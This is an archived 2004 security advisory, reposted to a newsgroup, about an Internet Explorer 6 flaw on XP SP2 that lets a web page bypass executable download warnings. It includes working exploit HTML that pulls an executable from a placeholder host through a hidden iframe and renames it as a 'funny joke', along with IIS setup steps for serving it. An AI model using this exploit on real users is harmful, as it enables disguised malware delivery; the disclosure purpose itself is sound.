Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms

Tech Tip: Click here to run a free scan for Windows Errors and optimize PC performance

From: JM Tella Llop [MVP Windows] (jmtella_at_XXXmvps.org)
Date: 11/21/04 

Date: Sun, 21 Nov 2004 19:09:52 +0100

Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets
Remote Users Bypass XP SP2 Download Warning Mechanisms

SecurityTracker Alert ID: 1012288
SecurityTracker URL: http://securitytracker.com/id?1012288
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Nov 20 2004
Impact: Modification of system information, Modification of user
information
Exploit Included: Yes
Version(s): 6
Description: A vulnerability was reported in Microsoft Internet
Explorer (IE) on Windows XP SP2. A remote user can invoke the
execCommand 'SaveAs' function via a custom HTTP 404 Not Found error
message to download arbitrary files to the target user's system
without the XP SP2 warning messages.

K-OTik posted technical details regarding the flaw disclosed by
cyber_flash (vengy).

It is reported that Internet Explorer does not properly process URLs
with certain extraneous characters.

A remote user can create a custom HTTP 404 error message and pass this
message to the execCommand Method to bypass the 'File Download' and
'File Open' security warnings.

Some demonstration exploit code is provided:

<html>
<body>
<iframe src='http://your.domain.com/v.exe?.htm' name="NotFound"
width="0" height="0"></iframe>
Click <a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">here</a>.
</body>
</html>

The following HTML, when loaded by the target user, will then trigger
the download prompt:

<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>

The user will be asked to save the document as an HTML document, but
will not be warned that the file is an executable. If the 'Hide file
extensions for known file types' option is enabled, then the file name
in this exploit example will appear as 'funny joke' (instead of the
true name 'funny joke.exe').

The original advisory is mirrored at:

http://www.k-otik.com/exploits/20041119.IESP2 disclosure.php
Impact: A remote user can create HTML that, when loaded by the target
user, will prompt the user to download a file but will bypass the XP
SP2 executable download warning messages.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/ (Links to External Site)
Cause: Access control error, State error
Underlying OS: Windows (Any)
Underlying OS Comments: Tested on Windows 2000 and XP SP2
Reported By: K-OTiK Security <Special-Alerts@k-otik.com>
Message History: None.

 Source Message Contents
Date: 20 Nov 2004 05:50:23 -0000
From: K-OTiK Security <Special-Alerts@k-otik.com>
Subject: Microsoft Internet Explorer 6 SP2 Vulnerabilities / Full

 

Let's play,

On Wednesday 17, Nov - Secunia released the advisory "Microsoft
Internet Explorer Two Vulnerabil
ities", related to a vulnerability
 discovered by "cyber flash". This unpatched "file download security
warning
bypass" flaw could be exploited to download a malicious executable
file masqueraded as a "H
TML document".

Microsoft said : "Secunia you're bad, this vulnerability was not
disclosed responsibly"

Secunia said "NO ! No ! We did not release the technical details of
this flaw and our policy is
to not reveal vulnerability details
 until a fix had been provided, unless they were already in the wild.
We did not discover this vulner
ability, so we can not censure
 it"

Some people said "Who is cyberflash ? perhaps Secunia discovered this
flaw, but masked it behind
 a third party researcher"

K-OTik Says to "Some people" : "cyber flash is not a fictitious
security researcher"
K-OTik Says to "MS & Secunia" : "There is no security through
obscurity...and full
 disclosure is our policy"

----------------------------------------------------------------
Internet Explorer 6.0 SP2 File Download Security Warning Bypass
----------------------------------------------------------------

Exploit -> http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
Technical Details - >
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php

all credits go to Cyber flash A.K.A Vengy

Regards
K-OTik Security Research & Survey Team 24/7
kttp://www.k-otik.com

<cyberflash>
The following code requires no special server setup, and should work
from any webpage that IE 6.0 fet
ches:
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="
0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
here</a>

Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"><
/iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
here</a>.

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:

Error Code: 404
Default Text: Not Found
Message Type: URL
URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"><
/iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error mes
sage as defined above. But, the
 javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked t
o 'funny joke.exe' when prompted
 to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');
</cyberflash>

 

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help

Copyright 2004, SecurityGlobal.net LLC 

-- 
Jose Manuel Tella Llop
MVP - Windows
jmtella@XXXcompuserve.com   (quitar XXX)
http://www.multingles.net/jmt.htm
Este mensaje se proporciona "como está" sin garantías de ninguna 
clase, y no otorga ningún derecho.
This posting is provided "AS IS" with no warranties, and confers no 
rights.
         You assume all risk for your use.

Relevant Pages